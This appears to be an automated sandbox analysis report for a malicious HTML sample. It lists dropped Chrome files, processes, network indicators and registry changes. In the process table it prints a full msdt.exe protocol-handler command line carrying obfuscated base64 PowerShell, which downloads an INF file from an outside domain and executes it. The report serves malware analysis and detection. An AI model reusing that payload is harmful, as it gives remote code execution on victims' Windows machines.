Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
test.html
|
HTML document, ASCII text, with very long lines, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\05b97af0-56f4-4761-a59c-a8582a4f6f44.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\0acb20e7-1cb9-4555-88df-ad3ecde17b18.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\1581d2df-d293-4e3a-bfc9-8169697b2311.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\1cc2bf79-9bc7-4e36-8b8a-4ea29d988551.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\274d8132-1626-48a1-9444-20d4502a5cfb.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\4225d5d6-2234-4c0f-8b35-1a315df7d078.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\0bc85a95-41a2-4651-8cd3-6041af165128.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\135928d8-fee2-4448-9f46-088740d19672.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\2169ac1e-74cd-4e20-907d-f9312b7a37b4.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\467e6509-bf7c-41f1-aa98-10fe54c3ffea.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\63f2ccea-901b-4e42-9043-54390c777e9d.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\246bcc96-50e9-47ca-924e-0964b8dd5ed7.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\e6f94121-00aa-4ef2-b378-44e953d64964.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\c2f2303b-71d6-4017-bace-dd85934d2e36.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\d3cda4a0-710b-4065-b89e-1b6eb044554c.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\df695e42-fbb0-47be-b6b2-1b49fd5f18cb.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f2c5450d-b85a-47c7-a1ba-caa55dd690ea.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\b0a5404f-dd1c-4c0d-b9c2-1f279c80789a.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\c9a2d23c-64cf-45e5-9842-e9998e4b834e.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\dd701e17-0d49-4ac1-b394-f091e29677c8.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\dd7501de-00da-4000-b3e8-97f6186442a9.tmp
|
PGP symmetric key encrypted data - Plaintext or unencrypted data salted -
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\f45cb8ad-bca4-4a2f-9a87-b87aba46ae6b.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\ffba62fe-1c27-4928-a8cf-06fac1be4d5d.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\01119693-a0e6-48c9-a6c2-9427f350eb38.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\0793800c-657c-42d9-958d-612619f1006d.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_1575036701\Recovery.crx3
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_1575036701\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_1575036701\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_1575036701\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\_platform_specific\x86_64\pnacl_public_pnacl_json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\_platform_specific\x86_64\pnacl_public_x86_64_crtend_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=7511538a3a6a0b862c772eace49075ed1bbe2377,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\_platform_specific\x86_64\pnacl_public_x86_64_libcrt_platform_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_80416975\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_813092686\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_813092686\_platform_specific\win_x64\widevinecdm.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_813092686\_platform_specific\win_x64\widevinecdm.dll.sig
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_813092686\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5592_813092686\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\0793800c-657c-42d9-958d-612619f1006d.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\bg\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\ca\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\cs\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\da\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\de\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\el\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\en\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\en_GB\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\es\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\es_419\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\et\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\fi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\fil\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\fr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\hi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\hr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\hu\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\id\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\it\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\ja\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\ko\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\lt\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\lv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\nb\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\nl\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\pl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\pt_BR\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\pt_PT\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\ro\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\ru\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\sk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\sl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\sr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\sv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\th\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\tr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\uk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\vi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\zh_CN\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_locales\zh_TW\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\craw_background.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\craw_window.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\css\craw_window.css
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\html\craw_window.html
|
HTML document, ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\images\flapper.gif
|
GIF image data, version 89a, 30 x 30
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\images\icon_128.png
|
PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\images\icon_16.png
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\images\topbar_floating_button.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\images\topbar_floating_button_close.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\images\topbar_floating_button_hover.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\images\topbar_floating_button_maximize.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\images\topbar_floating_button_pressed.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5592_260981526\CRX_INSTALL\manifest.json
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 115 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,12347978893562917743,15623376124230255058,131072
--lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1924 /prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\test.html
|
||
|
C:\Windows\System32\msdt.exe
|
"C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PcwdiAgnOSTiC%20-sKiP%20forCe%20-pArAm%20%22IT_ReBRowseforfiLE=#Ja2Y%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=W5A$(Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkFtRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0LXNMRWVQKDMpO1J1bkRsbDMyLkVYZSBhZHZwQWNLLmRsTCxMYXVuY2hJTkZTZWN0aW9uRXggIiRlTlY6QVBQREFUQVx0ZXN0LmluZiIsREVmQXVsdEluc1RBbGxfU0luZ2xFVVNFciwiJGVOdjpBUFBEQVRBXHRlc3QuaW5mIiw0LDA7U1RvUC1QUm9jRVNTIC1Gb3JDZSAtTmFNZSAnc2RpYWduaG9zdCc='+[CHar]34+'))'))))xW/../../../../../../../../../../../../../../../../.MsI%20%22
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://dns.google
|
unknown
|
||
|
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
|
unknown
|
||
|
https://www.google.com/intl/en-US/chrome/blank.html
|
unknown
|
||
|
https://ogs.google.com
|
unknown
|
||
|
https://www.google.com/images/cleardot.gif
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
|
216.58.215.238
|
||
|
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
|
142.250.203.109
|
||
|
https://payments.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
|
unknown
|
||
|
https://sandbox.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://www.google.com/images/x2.gif
|
unknown
|
||
|
https://accounts.google.com/MergeSession
|
unknown
|
||
|
http://llvm.org/):
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://www.google.com/images/dot2.gif
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry%s:
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry
|
unknown
|
||
|
https://accounts.google.com
|
unknown
|
||
|
https://clients2.googleusercontent.com
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://www.google.com/accounts/OAuthLogin?issueuberauth=1
|
unknown
|
||
|
https://www.google.com/
|
unknown
|
||
|
https://www-googleapis-staging.sandbox.google.com
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-clang.git
|
unknown
|
||
|
https://clients2.google.com
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
accounts.google.com
|
142.250.203.109
|
||
|
clients.l.google.com
|
216.58.215.238
|
||
|
clients2.google.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.168.2.1
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
216.58.215.238
|
clients.l.google.com
|
United States
|
||
|
192.168.2.255
|
unknown
|
unknown
|
||
|
127.0.0.1
|
unknown
|
unknown
|
||
|
142.250.203.109
|
accounts.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
ahfgeienlihckogmohjhadlkjgocpleb
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mfehgcgbbipciphmccgaenjidiccnmng
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mhjfbmdgcfjbbpaeojofohoefgiehjai
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
pkedcjkdefgpdelpbcmbmeomcjbeemfm
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
